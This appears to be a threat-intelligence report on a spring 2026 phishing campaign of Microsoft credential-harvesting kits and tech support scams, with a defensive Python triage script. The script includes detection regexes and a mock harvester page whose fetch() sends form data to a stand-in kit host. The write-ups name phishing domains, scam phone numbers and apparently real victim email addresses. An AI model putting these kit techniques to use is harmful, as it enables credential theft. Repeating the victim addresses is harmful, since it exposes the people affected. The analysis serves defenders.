Between March 26, 2026 and April 08, 2026, analysts identified a diverse campaign of 18 phishing incidents demonstrating sophisticated multi-stage credential harvesting operations predominantly targeting Microsoft (11 incidents), with additional impersonation of Adobe, Amazon, American Express, GoDaddy, and Facebook services. The attacks employed advanced evasion techniques including JavaScript-based credential exfiltration via fetch() and XMLHttpRequest methods, extensive code obfuscation through base64 encoding and randomized CSS class names, anti-debugging protections with disabled right-click functionality, and honeypot field bot detection mechanisms designed to evade automated analysis tools. Notable infrastructure abuse patterns emerged including legitimate cloud services (Azure Blob Storage, IPFS distributed hosting, Pantheon WordPress hosting) being weaponized for increased credibility, alongside suspicious .cfd top-level domains likely associated with phishing-as-a-service operations.
The campaign demonstrated sophistication in multi-factor authentication bypass capabilities, with threat actors implementing comprehensive MFA token collection through realistic SMS, authenticator app, and push notification prompts across multiple authentication stages. Emerging tactics included tech support scams using fake system error popups to drive phone-based social engineering, personalized email pre-population from URL parameters suggesting targeted delivery mechanisms, and the systematic replacement of legitimate Microsoft authentication endpoints with malicious infrastructure while maintaining authentic branding and OAuth-like parameter structures.
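A defender-side triage of captured page HTML for the indicator families summarized above, added here as an example (it is not PhishID tooling and not code from any kit described). The two sample pages, their hosts, the victim address and the 833-555 phone number are constructed; the base64 blob is the one quoted in the artistlk.com entry, and the regexes are approximations of the report's indicators rather than kit signatures.

```python
"""Static triage of captured phishing-page HTML for the indicator families this
report describes. Added example, not PhishID tooling; samples are constructed.
Regexes are approximations of the report's indicators, not kit signatures."""
import base64
import re
from urllib.parse import urlparse

PATTERNS = {
    "js_exfil": re.compile(r"\b(?:fetch|XMLHttpRequest)\s*\(", re.I),
    "anti_debug": re.compile(r"contextmenu|user-select\s*:\s*none|selectstart", re.I),
    "exit_prevention": re.compile(r"beforeunload", re.I),
    "randomized_ids": re.compile(r"\b[a-z]+_[a-z]+_\d{3}\b"),  # a_panel_796, prop_state_758
    "honeypot": re.compile(r"<input[^>]*(?:display\s*:\s*none|visibility\s*:\s*hidden)[^>]*>", re.I),
    "scam_popup": re.compile(r"System32|access violation|anomalous activity|Trojan:Win32", re.I),
    "tollfree_phone": re.compile(r"\+?1\s*\(?8(?:00|33|44|55|66|77|88)\)?[\s.-]?\d{3}[\s.-]?\d{4}"),
    "disabled_inputs": re.compile(r"<input[^>]*\bdisabled\b", re.I),
    "cursor_none": re.compile(r"cursor\s*:\s*none", re.I),
}
EMAIL_IN_URL = re.compile(r"[?&#][^\s\"'&]*(?:%40|@)[\w.-]+")  # victim pre-population
SUSPICIOUS_TLDS = (".cfd", ".click")
MICROSOFT_HOSTS = ("login.microsoftonline.com", "login.live.com")


def decode_b64_blobs(html):
    """Decode long base64 runs (kits hide JS/config this way); keep readable ASCII only."""
    found = []
    for m in re.finditer(r"[A-Za-z0-9+/]{40,}={0,2}", html):
        blob = m.group(0)
        try:
            text = base64.b64decode(blob + "=" * (-len(blob) % 4)).decode("ascii")
        except (ValueError, UnicodeDecodeError):
            continue  # random tokens and hashes do not decode to readable text
        if all(c.isprintable() or c in "\r\n\t" for c in text):
            found.append(text)
    return found


def triage(url, html):
    """Return (verdict, sorted indicator names) for one captured page."""
    hits = {name for name, rx in PATTERNS.items() if rx.search(html)}
    host = urlparse(url).hostname or ""
    if host.endswith(SUSPICIOUS_TLDS):
        hits.add("suspicious_tld")
    if EMAIL_IN_URL.search(url):
        hits.add("email_in_url")
    # Microsoft's own /common/ login paths served from a non-Microsoft host
    for action in re.findall(r"action=[\"']([^\"']+)", html, re.I):
        action_host = urlparse(action).hostname or host
        if "/common/" in action and not action_host.endswith(MICROSOFT_HOSTS):
            hits.add("rewritten_ms_endpoint")
    if any(re.search(r"\bfunction\b|document\.", t) for t in decode_b64_blobs(html)):
        hits.add("b64_encoded_js")
    # Report's split: scams show fake alerts plus a number to call and have no
    # working submission path; harvesters carry the submission machinery.
    exfil = hits & {"js_exfil", "rewritten_ms_endpoint", "honeypot", "b64_encoded_js"}
    if {"scam_popup", "tollfree_phone"} <= hits and not exfil:
        return "tech_support_scam", sorted(hits)
    return ("credential_harvester" if exfil else "unclear"), sorted(hits)


# Constructed samples; the base64 blob is the one quoted in the artistlk.com entry.
HARVESTER_URL = "https://example-kit.cfd/x9f2k/index.html#victim@example.com"
HARVESTER_HTML = """<html><head><style>body{user-select:none}</style></head>
<body oncontextmenu="return false">
<form action="https://example-kit.cfd/common/login" method="post">
<input type="email" name="login" class="var_state_502">
<input type="text" name="website" class="a_panel_796" style="display:none">
<input type="password" name="passwd"></form>
<script>var prop_text_527="ZnVuY3Rpb24gYygpe2lmKCFkb2N1bWVudC5xdWVyeVNlbGVjdG9yKCIuYiIpIHx8ICFkb2N1bWVudC5xdWVyeVNlbGVjdG9yKCIuZyIpKXt";
function send(f){fetch(cfg.u,{method:"POST",body:new FormData(f)});}
window.addEventListener("beforeunload",function(e){e.preventDefault();});</script>
</body></html>"""
SCAM_URL = "https://example-tenant.z13.web.core.windows.net/index.html"
SCAM_HTML = """<html><body style="cursor:none">
<div class="modal">System Error: Memory access violation at 0x88412</div>
<div class="modal">Security Alert: Password required for System32</div>
<div class="chat">Anomalous activity detected. Call support: +1 (833) 555-0100</div>
<input type="text" placeholder="Email" disabled>
<script>window.onbeforeunload=function(){return "Do not close this page";};</script>
</body></html>"""

if __name__ == "__main__":
    for u, h in ((HARVESTER_URL, HARVESTER_HTML), (SCAM_URL, SCAM_HTML)):
        print(u, *triage(u, h))
```

Run over a captured page with the lure URL, the verdict separates the phone-based scams from the credential kits, and the decoded base64 shows the quoted blob is a DOM-readiness check rather than exfiltration code.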
On April 02, 2026 and April 08, 2026, employees at a Florida organization clicked the above phishing page. This appears to be a tech support scam rather than a traditional credential harvesting phishing page, as there are no functional credential capture forms or JavaScript exfiltration mechanisms present in the code. The page uses sophisticated social engineering tactics including fake Microsoft branding, multiple overlapping popup dialogs simulating "System Error" and "Security" alerts with messages like "Password required for System32" and "Memory access violation at 0x88412," and a persistent chat widget displaying urgent messages about "anomalous activity detected" with a prominently displayed phone number +1 (833) 926-4307.
The site is hosted on the on-forge.com platform and includes advanced visual deception techniques such as disabled input fields to prevent interaction, cursor manipulation (cursor-none), page exit prevention JavaScript, and Facebook pixel tracking for campaign optimization. While technically sophisticated in its visual presentation and psychological manipulation tactics, this represents a moderate sophistication level focused on phone-based social engineering rather than automated credential theft, with the ultimate goal being to trick users into calling the fake support number rather than submitting credentials online.
This is a sophisticated tech support scam that does not employ traditional credential capture techniques but instead uses psychological manipulation to trick victims into calling a fraudulent phone number (+1 888-654-1398). The page employs advanced social engineering tactics including fake Microsoft branding, fabricated system error pop-ups claiming "Memory access violation at 0x88412" and "Password required for System32," animated chat widgets simulating real-time security analysis with messages about "anomalous activity detected," and multiple overlapping modal dialogs creating artificial urgency.
The site is hosted on Azure Blob Storage (14e00019294b4.z13.web.core.windows.net) and integrates legitimate Tawk.to chat services and Plausible analytics to appear more credible, while using disabled form inputs to prevent any actual data submission and force victims toward the phone-based social engineering attack vector. This represents a moderately sophisticated approach that combines legitimate cloud infrastructure abuse with well-crafted visual deception and psychological pressure tactics, focusing on phone-based fraud rather than automated credential theft.
On April 01, 2026, an employee at a Florida organization clicked the above phishing page.
On April 01, 2026, April 02, 2026, April 03, 2026, April 06, 2026, March 27, 2026, and March 31, 2026, employees at a Georgia organization clicked the above phishing page.
On April 01, 2026, March 26, 2026, and March 31, 2026, employees at an Idaho organization clicked the above phishing page.
On April 06, 2026, March 26, 2026, and March 27, 2026, employees at an Illinois organization clicked the above phishing page.
On April 01, 2026, April 02, 2026, April 06, 2026, March 26, 2026, and March 31, 2026, employees at a Kentucky organization clicked the above phishing page.
On April 03, 2026, an employee at a Maryland organization clicked the above phishing page.
On April 06, 2026, an employee at a Nevada organization clicked the above phishing page.
On April 01, 2026, April 02, 2026, April 07, 2026, April 08, 2026, March 26, 2026, March 27, 2026, and March 31, 2026, employees at a Texas organization clicked the above phishing page.
On April 03, 2026, an employee at a Virginia organization clicked the above phishing page.
On April 01, 2026, an employee at a Washington organization clicked the above phishing page.
On April 08, 2026, an employee at a Florida organization clicked the above phishing page. This is a sophisticated multi-stage Microsoft credential harvesting kit that captures usernames, passwords, and MFA tokens through JavaScript-based exfiltration rather than traditional form POST methods, with data likely transmitted via fetch() or XMLHttpRequest to backend endpoints (specific URLs are obfuscated in referenced external JS files). The kit employs advanced evasion techniques including extensive code obfuscation with base64-encoded configurations, randomized CSS class names throughout the interface, anti-debugging protections that disable text selection and right-click functionality, and bot detection mechanisms through honeypot fields and security validation handlers.
The phishing page demonstrates high sophistication with realistic Microsoft branding, a convincing loading screen animation, multi-step authentication flow that mimics genuine Microsoft login including authenticator app prompts and SMS verification, and appears to be hosted on legitimate infrastructure (the domain suggests a compromised UK scaffolding company website). Notable advanced features include real-time form validation, dynamic content switching between authentication methods, and integration with security libraries that likely perform environment detection and anti-analysis checks before credential exfiltration occurs.
On April 07, 2026, an employee at a California organization clicked the above phishing page. This appears to be a basic password prompt page that uses standard HTML form submission for credential capture, though the HTML provided is incomplete and cuts off before showing the actual form element or JavaScript submission code. The page employs Microsoft branding impersonation with a professional-looking design that includes complex SVG background graphics to appear legitimate, and incorporates the victim's email address (haley_w_2000@hotmail.com) directly in the URL fragment for personalization.
The page is hosted on IPFS (InterPlanetary File System) via dweb.link, which is a legitimate distributed storage service commonly abused by threat actors for hosting phishing content due to its decentralized nature and difficulty in takedown. This represents a basic to moderate sophistication level, utilizing service abuse for hosting infrastructure and social engineering through brand impersonation and personalization, though without seeing the complete form submission mechanism, the exact credential exfiltration method cannot be definitively determined.
On April 07, 2026, employees at a Kentucky organization clicked the above phishing page. This phishing page employs multi-stage credential harvesting using JavaScript-based form submissions that POST to obfuscated endpoints, with the primary collection handled through fetch() requests to dynamically determined URLs based on base64-encoded configuration variables. The page implements sophisticated evasion techniques including anti-debugging protections (disabled right-click, text selection blocking), bot detection through honeypot fields with class "a_panel_796", and security validation systems that check for developer tools or automated analysis environments before displaying content.
Notable advanced features include a complete Microsoft 365 authentication flow simulation with MFA collection (supports authenticator apps, SMS codes, and push notifications), real-time form validation with dynamic error messaging using obfuscated image-based responses, and extensive code obfuscation through randomized CSS class names and base64-encoded JavaScript configuration objects. The sophistication level is advanced, particularly due to the comprehensive multi-factor authentication bypass capabilities, anti-analysis measures, and the realistic replication of Microsoft's entire sign-in process including loading animations, responsive design, and authentic-looking error states that would effectively deceive users into providing complete account credentials and bypass tokens.
On April 02, 2026 and April 06, 2026, employees at a Kentucky organization clicked the above phishing page. This phishing page employs a sophisticated Microsoft login impersonation hosted on artistlk.com that captures credentials via standard form POST to https://artistlk.com/common/login, mimicking legitimate Microsoft Azure AD authentication infrastructure. The page implements advanced evasion techniques including base64-encoded JavaScript obfuscation (ZnVuY3Rpb24gYygpe2lmKCFkb2N1bWVudC5xdWVyeVNlbGVjdG9yKCIuYiIpIHx8ICFkb2N1bWVudC5xdWVyeVNlbGVjdG9yKCIuZyIpKXt...), comprehensive error handling via WebWatson telemetry system, and sophisticated browser fingerprinting through device detection and user-agent analysis.
The site demonstrates high technical sophistication by implementing complete Microsoft authentication flow simulation including FIDO challenge tokens, OAuth state management, and tenant branding customization, while using GoGuardian script injection and Cloudflare infrastructure to appear legitimate. Notably, it pre-fills the victim's email address (kelley.moore@carter.kyschools.us) extracted from URL parameters, implements circuit breaker patterns for resource loading failures, and includes comprehensive session state management that closely mirrors genuine Microsoft login infrastructure.
On April 02, 2026, an employee at a Minnesota organization clicked the above phishing page. This phishing page uses a standard HTML form POST method to capture credentials, submitting data to "processmail.php" for initial email/password collection and "process.php" for OTP collection in a sophisticated multi-stage attack flow. The site impersonates Adobe and multiple email providers (Outlook, Office365, Yahoo, Gmail, AOL) with convincing branding and implements a realistic two-factor authentication bypass by displaying fake OTP prompts with countdown timers and loading animations to create urgency and legitimacy.
The page demonstrates moderate to advanced sophistication through its multi-stage credential harvesting (first login attempt shows "Incorrect Password," second attempt triggers OTP flow), detailed social engineering with provider-specific imagery and messaging, and professional UI elements including animated confetti effects and responsive design. Notable technical features include jQuery-based AJAX submission handling, dynamic modal population based on the selected email provider, and a realistic 5-minute countdown timer for the OTP stage, all hosted on the "axim.digital" domain with Cloudflare protection services.
On April 02, 2026, an employee at a Florida organization clicked the above phishing page. This phishing page primarily captures credentials through standard HTML form submission that would POST to various API endpoints on the malicious domain sso.psvvadmin.com, including login paths like */api/idp/login* and */api/pass/login* as configured in the KPSDK JavaScript module. The page demonstrates moderate sophistication through several notable TTPs: it uses base64-encoded JavaScript obfuscation in the initial script tag, implements comprehensive Microsoft 365/GoDaddy brand impersonation with authentic-looking logos and styling, and includes advanced evasion techniques such as device fingerprinting through TransUnion's risk assessment system and Kasada bot detection services.
The infrastructure leverages the suspicious domain psvvadmin.com (likely typosquatting godaddy.com) while loading legitimate resources from img6.wsimg.com to maintain authenticity, and the page includes extensive URL parameters suggesting it was delivered through a targeted email campaign with victim-specific information like "darren@citysidesuites.com" pre-populated. Most notably, the page implements real-time credential validation capabilities and multi-factor authentication collection through the comprehensive API endpoint configuration, indicating this is likely part of a sophisticated phishing-as-a-service operation rather than a basic credential harvester.
On April 01, 2026, an employee at a Kentucky organization clicked the above phishing page. This phishing page captures credentials through JavaScript-based exfiltration using fetch() requests to external endpoints, implementing a sophisticated multi-stage Microsoft login simulation that progressively collects email, password, and MFA codes across multiple realistic interface screens. The page employs extensive evasion techniques including randomized CSS class names throughout the code, base64-encoded configuration parameters (prop_type_769, prop_text_527, var_state_502, etc.), anti-debugging protection with disabled text selection and right-click context menus, and references to security validation systems (PageValidator.create, securityHandler) suggesting bot detection capabilities.
The infrastructure appears to use the suspicious domain "elevatcapital.cfd" with an extremely long obfuscated URL path containing random characters, indicating either compromised hosting or a disposable phishing service. This represents an advanced-level phishing kit with professional-grade Microsoft interface mimicry, comprehensive MFA collection (SMS codes, authenticator app approval, verification codes), and sophisticated anti-analysis measures designed to evade detection while capturing complete authentication flows.
On April 01, 2026, an employee at a Maryland organization clicked the above phishing page. This phishing page uses standard HTML form submission to capture credentials, posting to the same domain (willood.com) which impersonates Amazon through consistent branding, logos, and the title "Log In - Amazon". The most significant TTPs observed include sophisticated brand impersonation with legitimate-looking Amazon logos served from a CDN (cdn.materialjyh.com), extensive JavaScript obfuscation using URL-encoded configuration data that when decoded reveals detailed e-commerce functionality mimicking a legitimate shopping platform, and integration with multiple tracking pixels including Pinterest, TikTok, and Facebook for evasion and analytics.
The infrastructure appears to be a purpose-built phishing site rather than compromised legitimate hosting, with the domain willood.com clearly designed to deceive users into believing they're interacting with Amazon's legitimate login portal. This represents a moderate to advanced sophistication level due to the extensive configuration system, multiple tracking integrations, and detailed brand impersonation elements that go far beyond a basic credential capture form.
On March 30, 2026 and March 31, 2026, employees at a Florida organization clicked the above phishing page. This Microsoft phishing page employs a multi-stage credential capture system that collects username, password, and MFA codes through standard form submissions handled by JavaScript event listeners, with the stolen data likely transmitted via fetch() or XMLHttpRequest calls to the attacker's server (though the specific exfiltration endpoints are obfuscated in external JS files). The page demonstrates moderate sophistication with several notable evasion techniques including anti-bot honeypot fields (class a_module_706 with hidden positioning), disabled right-click and text selection via CSS user-select properties, anti-debugging protection through PageValidator and securityHandler objects, and obfuscated configuration data using base64 encoding (visible in prop_flag_527 and prop_state_758 variables).
The site is hosted on a suspicious domain (platformcorp.cfd) and implements a convincing Microsoft authentication flow replica complete with animated loading screens, realistic form validation, multiple 2FA collection stages (SMS codes, authenticator app approval, verification codes), and sophisticated UI elements that closely mimic legitimate Microsoft login pages. The presence of comprehensive bot detection, randomized CSS class names for fingerprint avoidance, and the multi-vector MFA collection capability indicates this is likely part of a professional phishing kit designed for high-value target compromise rather than a basic credential harvester.
On March 30, 2026, an employee at a Kentucky organization clicked the above phishing page. This is a sophisticated tech support scam that uses visual deception rather than traditional credential harvesting, with no actual form submissions or JavaScript exfiltration mechanisms present in the code. The page employs multiple layers of social engineering including fake Facebook account suspension notices, simulated Windows Security threats with fabricated "Trojan:Win32/Hive.ZY" warnings, cascading error popup animations, and persistent phone number displays (+1 844-519-6992) designed to pressure victims into calling for "emergency support."
The site is hosted on Azure Front Door (azurefd.net) and uses sophisticated visual manipulation with disabled form inputs, fake progress bars, simulated terminal windows showing malicious code, and multiple overlapping modal dialogs to create panic. While technically advanced in its presentation and psychological manipulation tactics, the scam relies entirely on phone-based social engineering rather than automated credential capture, representing a moderate sophistication level focused on convincing users their systems are compromised to extract payment or remote access permissions over the phone.
On March 30, 2026, an employee at a Texas organization clicked the above phishing page. This phishing page uses a multi-stage credential capture approach with form POST submissions to "processmail.php" for initial credentials and "process.php" for OTP collection, implementing a sophisticated three-stage attack flow that first accepts any credentials, then shows "Incorrect Password" to prompt re-entry, and finally requests OTP/MFA tokens through a fake time-pressured countdown interface. The page impersonates Greenvelope invitation services while targeting multiple email providers (Outlook, Office365, Yahoo, AOL) and employs several social engineering tactics including urgency messaging about invitation access, fake loading animations with "Verifying..." text, and legitimate brand logos to establish trust.
The infrastructure appears to use a suspicious domain "donman.mpinvitepartyhh.de" with Cloudflare services, and the sophistication level is moderate due to the multi-modal collection approach, staged JavaScript form handling that simulates authentication failures, and the inclusion of MFA bypass capabilities with realistic countdown timers. The most notable aspect is the deliberate "stage-three" JavaScript logic that ensures victims re-enter credentials after an initial "incorrect password" response, maximizing the likelihood of capturing valid credentials.
On March 28, 2026, an employee at an Illinois organization clicked the above phishing page. This phishing page uses a standard HTML form credential capture mechanism that appears to POST to the same domain upon submission, targeting American Express customers through brand impersonation with Unicode look-alike character substitution in the rendered text (e.g., "áªoÉ¡ â ᥠto Îy ÐϲÑouá¥t" for "Log in to My Account"). The page employs several evasion techniques including responsive design elements that hide navigation components on smaller screens, custom CSS styling to mimic legitimate American Express branding, and a full-screen loading overlay with spinning animation to create false legitimacy during form processing.
The site is hosted on the suspicious domain "ameurincaprures.com" with a complex nested URL path structure, and incorporates social engineering elements like professional styling, American flag imagery, trust indicators through fake footer links and social media icons, plus comprehensive form fields including account type selection to maximize credential collection. The sophistication level is moderate, notable for its extensive CSS styling to closely replicate the authentic American Express login experience and the Unicode obfuscation technique used to disguise text content while maintaining visual similarity to legitimate branding.
On March 27, 2026, an employee at a Kentucky organization clicked the above phishing page. This phishing page captures credentials through a jQuery AJAX POST request to a validation endpoint using obfuscated JavaScript code that heavily employs custom base-85 style encoding functions (vBeUBGG, OQgDlz, AlkVvT) to hide malicious functionality. The site impersonates GoDaddy's Office 365 login interface and includes sophisticated evasion techniques such as honeypot field detection that redirects victims to a random Wikipedia page if bot behavior is detected, caps lock detection warnings, real-time password visibility toggles, and multi-layered obfuscation that makes static analysis difficult.
The infrastructure appears to be hosted on a suspicious domain (circuitcorp.cfd) with an extremely long URL path containing encoded parameters, and the code references security tokens and timestamps suggesting coordination with a backend credential validation system. This represents an advanced-level phishing kit with significant anti-analysis measures, real-time form validation, and sophisticated JavaScript obfuscation that goes well beyond basic form submission phishing.
On March 27, 2026, an employee at an organization clicked the above phishing page. This appears to be a legitimate GLPI (IT Asset Management software) login page rather than a phishing site, as evidenced by the authentic GLPI framework structure, proper CSS/JavaScript module loading, comprehensive localization files, and standard form-based authentication without any credential exfiltration mechanisms. The page uses a standard HTML form submission method for authentication, loads extensive legitimate GLPI JavaScript modules including TinyMCE editor, FullCalendar, and various UI components, and demonstrates the complexity typical of genuine enterprise software with proper internationalization support for dozens of languages.
The HTML structure shows no obfuscation, no external credential harvesting endpoints, no social engineering tactics, and maintains the authentic GLPI branding and functionality. This represents a basic authentication form with standard sophistication levels expected from legitimate enterprise software, hosted on what appears to be an internal network (e465glpi/) suggesting it may be an internal company GLPI instance rather than a malicious phishing attempt.
On March 26, 2026, an employee at a Kentucky organization clicked the above phishing page. This appears to be a compromised legitimate WordPress website (dev-fourriversrealtor-com.pantheonsite.io) being used to host phishing content, with the victim's email address pre-populated in the URL parameter (patricia.seabolt%40bath.kyschools.us) suggesting email-based delivery with personalization. The HTML shows a standard WordPress theme (Astra) with Gravity Forms integration, but the actual credential capture mechanism is not visible in the provided HTML head section; the form submission endpoint and method would be contained in the body content, which was truncated.
The infrastructure leverages Pantheon hosting (a legitimate WordPress hosting platform) making it appear more trustworthy, and the presence of the pre-filled email parameter indicates basic personalization to increase victim trust. This represents a moderate sophistication attack using compromised legitimate infrastructure rather than purpose-built phishing domains, though the actual credential harvesting mechanism cannot be determined from the incomplete HTML provided.
On March 26, 2026, an employee at a Kentucky organization clicked the above phishing page. This phishing page employs a sophisticated Microsoft login impersonation that captures credentials through standard form POST submission to "/common/login" on the malicious domain ranksizexxl.click, while simultaneously implementing several advanced evasion techniques. The page demonstrates high sophistication by perfectly replicating Microsoft's authentic login interface including legitimate Microsoft CDN references (aadcdn.msftauth.net), complex OAuth-like parameter structures, and extensive JavaScript configuration that mimics real Microsoft authentication flows.
Notable TTPs include the use of legitimate Microsoft branding and CSS/JS resources to enhance credibility, URL manipulation where legitimate Microsoft URLs are systematically replaced with the malicious domain (ranksizexxl.click/2/ and ranksizexxl.click/common/), and the implementation of Microsoft's actual authentication flow structure including nonces, state parameters, and session management. The attack is particularly sophisticated as it maintains the complete look, feel, and behavior of a genuine Microsoft login page while redirecting all authentication attempts to attacker-controlled infrastructure, representing an advanced-level threat that would be extremely difficult for users to distinguish from legitimate Microsoft services.